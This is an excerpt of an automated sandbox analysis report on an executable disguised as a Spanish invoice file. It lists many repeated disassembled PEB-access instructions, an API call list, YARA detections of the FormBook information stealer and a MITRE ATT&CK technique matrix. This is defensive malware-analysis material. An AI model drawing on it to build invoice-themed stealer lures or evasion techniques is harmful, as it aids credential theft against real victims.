      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB480 mov eax, dword ptr fs:[00000030h]3_2_324DB480
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325134B0 mov eax, dword ptr fs:[00000030h]3_2_325134B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325874B0 mov eax, dword ptr fs:[00000030h]3_2_325874B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D74B0 mov eax, dword ptr fs:[00000030h]3_2_324D74B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D74B0 mov eax, dword ptr fs:[00000030h]3_2_324D74B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258B550 mov eax, dword ptr fs:[00000030h]3_2_3258B550
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258B550 mov eax, dword ptr fs:[00000030h]3_2_3258B550
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258B550 mov eax, dword ptr fs:[00000030h]3_2_3258B550
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251B570 mov eax, dword ptr fs:[00000030h]3_2_3251B570
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251B570 mov eax, dword ptr fs:[00000030h]3_2_3251B570
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB562 mov eax, dword ptr fs:[00000030h]3_2_324DB562
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32517505 mov eax, dword ptr fs:[00000030h]3_2_32517505
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32517505 mov ecx, dword ptr fs:[00000030h]3_2_32517505
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251D530 mov eax, dword ptr fs:[00000030h]3_2_3251D530
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251D530 mov eax, dword ptr fs:[00000030h]3_2_3251D530
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5537 mov eax, dword ptr fs:[00000030h]3_2_325B5537
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259B52F mov eax, dword ptr fs:[00000030h]3_2_3259B52F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED534 mov eax, dword ptr fs:[00000030h]3_2_324ED534
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED534 mov eax, dword ptr fs:[00000030h]3_2_324ED534
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED534 mov eax, dword ptr fs:[00000030h]3_2_324ED534
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED534 mov eax, dword ptr fs:[00000030h]3_2_324ED534
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED534 mov eax, dword ptr fs:[00000030h]3_2_324ED534
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED534 mov eax, dword ptr fs:[00000030h]3_2_324ED534
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D5D0 mov eax, dword ptr fs:[00000030h]3_2_3255D5D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D5D0 mov ecx, dword ptr fs:[00000030h]3_2_3255D5D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325095DA mov eax, dword ptr fs:[00000030h]3_2_325095DA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B35D7 mov eax, dword ptr fs:[00000030h]3_2_325B35D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B35D7 mov eax, dword ptr fs:[00000030h]3_2_325B35D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B35D7 mov eax, dword ptr fs:[00000030h]3_2_325B35D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325155C0 mov eax, dword ptr fs:[00000030h]3_2_325155C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B55C9 mov eax, dword ptr fs:[00000030h]3_2_325B55C9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015F4 mov eax, dword ptr fs:[00000030h]3_2_325015F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015F4 mov eax, dword ptr fs:[00000030h]3_2_325015F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015F4 mov eax, dword ptr fs:[00000030h]3_2_325015F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015F4 mov eax, dword ptr fs:[00000030h]3_2_325015F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015F4 mov eax, dword ptr fs:[00000030h]3_2_325015F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015F4 mov eax, dword ptr fs:[00000030h]3_2_325015F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D758F mov eax, dword ptr fs:[00000030h]3_2_324D758F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D758F mov eax, dword ptr fs:[00000030h]3_2_324D758F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D758F mov eax, dword ptr fs:[00000030h]3_2_324D758F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256B594 mov eax, dword ptr fs:[00000030h]3_2_3256B594
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256B594 mov eax, dword ptr fs:[00000030h]3_2_3256B594
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F5BE mov eax, dword ptr fs:[00000030h]3_2_3259F5BE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3257D5B0 mov eax, dword ptr fs:[00000030h]3_2_3257D5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3257D5B0 mov eax, dword ptr fs:[00000030h]3_2_3257D5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325735BA mov eax, dword ptr fs:[00000030h]3_2_325735BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325735BA mov eax, dword ptr fs:[00000030h]3_2_325735BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325735BA mov eax, dword ptr fs:[00000030h]3_2_325735BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325735BA mov eax, dword ptr fs:[00000030h]3_2_325735BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B35B6 mov eax, dword ptr fs:[00000030h]3_2_325B35B6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015A9 mov eax, dword ptr fs:[00000030h]3_2_325015A9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015A9 mov eax, dword ptr fs:[00000030h]3_2_325015A9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015A9 mov eax, dword ptr fs:[00000030h]3_2_325015A9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015A9 mov eax, dword ptr fs:[00000030h]3_2_325015A9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015A9 mov eax, dword ptr fs:[00000030h]3_2_325015A9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9A40 mov ecx, dword ptr fs:[00000030h]3_2_324D9A40
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573A78 mov eax, dword ptr fs:[00000030h]3_2_32573A78
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573A78 mov eax, dword ptr fs:[00000030h]3_2_32573A78
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573A78 mov eax, dword ptr fs:[00000030h]3_2_32573A78
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573A78 mov eax, dword ptr fs:[00000030h]3_2_32573A78
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573A78 mov eax, dword ptr fs:[00000030h]3_2_32573A78
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573A78 mov eax, dword ptr fs:[00000030h]3_2_32573A78
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32509A18 mov ecx, dword ptr fs:[00000030h]3_2_32509A18
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255DA1D mov eax, dword ptr fs:[00000030h]3_2_3255DA1D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32587A11 mov edi, dword ptr fs:[00000030h]3_2_32587A11
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32515A01 mov eax, dword ptr fs:[00000030h]3_2_32515A01
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32515A01 mov ecx, dword ptr fs:[00000030h]3_2_32515A01
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32515A01 mov eax, dword ptr fs:[00000030h]3_2_32515A01
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32515A01 mov eax, dword ptr fs:[00000030h]3_2_32515A01
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258BA0B mov eax, dword ptr fs:[00000030h]3_2_3258BA0B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258BA0B mov eax, dword ptr fs:[00000030h]3_2_3258BA0B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258BA0B mov eax, dword ptr fs:[00000030h]3_2_3258BA0B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258BA0B mov eax, dword ptr fs:[00000030h]3_2_3258BA0B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259FA02 mov eax, dword ptr fs:[00000030h]3_2_3259FA02
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DBA10 mov eax, dword ptr fs:[00000030h]3_2_324DBA10
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DA20 mov eax, dword ptr fs:[00000030h]3_2_3250DA20
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DA20 mov eax, dword ptr fs:[00000030h]3_2_3250DA20
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBA30 mov eax, dword ptr fs:[00000030h]3_2_324EBA30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBA30 mov ecx, dword ptr fs:[00000030h]3_2_324EBA30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBA30 mov eax, dword ptr fs:[00000030h]3_2_324EBA30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBA30 mov eax, dword ptr fs:[00000030h]3_2_324EBA30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBA30 mov eax, dword ptr fs:[00000030h]3_2_324EBA30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBA30 mov eax, dword ptr fs:[00000030h]3_2_324EBA30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32575AD0 mov eax, dword ptr fs:[00000030h]3_2_32575AD0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250BADA mov eax, dword ptr fs:[00000030h]3_2_3250BADA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32561ACB mov eax, dword ptr fs:[00000030h]3_2_32561ACB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32561ACB mov ecx, dword ptr fs:[00000030h]3_2_32561ACB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DBAE0 mov eax, dword ptr fs:[00000030h]3_2_324DBAE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D7A80 mov eax, dword ptr fs:[00000030h]3_2_324D7A80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D7A80 mov eax, dword ptr fs:[00000030h]3_2_324D7A80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D7A80 mov eax, dword ptr fs:[00000030h]3_2_324D7A80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259FA87 mov eax, dword ptr fs:[00000030h]3_2_3259FA87
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DFAA4 mov ecx, dword ptr fs:[00000030h]3_2_324DFAA4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBAA0 mov eax, dword ptr fs:[00000030h]3_2_324EBAA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBAA0 mov eax, dword ptr fs:[00000030h]3_2_324EBAA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258DAAC mov ecx, dword ptr fs:[00000030h]3_2_3258DAAC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258DAAC mov ecx, dword ptr fs:[00000030h]3_2_3258DAAC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258DAAC mov eax, dword ptr fs:[00000030h]3_2_3258DAAC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32591AA3 mov eax, dword ptr fs:[00000030h]3_2_32591AA3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32591AA3 mov eax, dword ptr fs:[00000030h]3_2_32591AA3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32591AA3 mov eax, dword ptr fs:[00000030h]3_2_32591AA3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DAAE mov eax, dword ptr fs:[00000030h]3_2_3250DAAE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DFB4C mov edi, dword ptr fs:[00000030h]3_2_324DFB4C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32575B50 mov eax, dword ptr fs:[00000030h]3_2_32575B50
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32575B50 mov eax, dword ptr fs:[00000030h]3_2_32575B50
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32583B60 mov eax, dword ptr fs:[00000030h]3_2_32583B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32583B60 mov eax, dword ptr fs:[00000030h]3_2_32583B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32583B60 mov eax, dword ptr fs:[00000030h]3_2_32583B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32583B60 mov eax, dword ptr fs:[00000030h]3_2_32583B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32583B60 mov eax, dword ptr fs:[00000030h]3_2_32583B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1B04 mov eax, dword ptr fs:[00000030h]3_2_324E1B04
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1B04 mov eax, dword ptr fs:[00000030h]3_2_324E1B04
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B3B10 mov eax, dword ptr fs:[00000030h]3_2_325B3B10
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DB00 mov eax, dword ptr fs:[00000030h]3_2_3250DB00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DB00 mov eax, dword ptr fs:[00000030h]3_2_3250DB00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DB00 mov eax, dword ptr fs:[00000030h]3_2_3250DB00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DB00 mov eax, dword ptr fs:[00000030h]3_2_3250DB00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DB00 mov eax, dword ptr fs:[00000030h]3_2_3250DB00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DB00 mov edx, dword ptr fs:[00000030h]3_2_3250DB00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259FB0C mov eax, dword ptr fs:[00000030h]3_2_3259FB0C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32519B28 mov eax, dword ptr fs:[00000030h]3_2_32519B28
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32519B28 mov eax, dword ptr fs:[00000030h]3_2_32519B28
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D7BCD mov eax, dword ptr fs:[00000030h]3_2_324D7BCD
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D7BCD mov ecx, dword ptr fs:[00000030h]3_2_324D7BCD
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E9BC4 mov eax, dword ptr fs:[00000030h]3_2_324E9BC4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256FBDC mov eax, dword ptr fs:[00000030h]3_2_3256FBDC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256FBDC mov eax, dword ptr fs:[00000030h]3_2_3256FBDC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256FBDC mov eax, dword ptr fs:[00000030h]3_2_3256FBDC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3BD6 mov eax, dword ptr fs:[00000030h]3_2_324F3BD6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3BD6 mov eax, dword ptr fs:[00000030h]3_2_324F3BD6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3BD6 mov eax, dword ptr fs:[00000030h]3_2_324F3BD6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3BD6 mov eax, dword ptr fs:[00000030h]3_2_324F3BD6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3BD6 mov eax, dword ptr fs:[00000030h]3_2_324F3BD6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259FBF3 mov eax, dword ptr fs:[00000030h]3_2_3259FBF3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32521BEF mov eax, dword ptr fs:[00000030h]3_2_32521BEF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32521BEF mov eax, dword ptr fs:[00000030h]3_2_32521BEF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"Jump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036D7

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.2382836731.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.2382836731.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		2
      Virtualization/Sandbox Evasion      		OS Credential Dumping221
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection      		1
      Access Token Manipulation      		LSASS Memory2
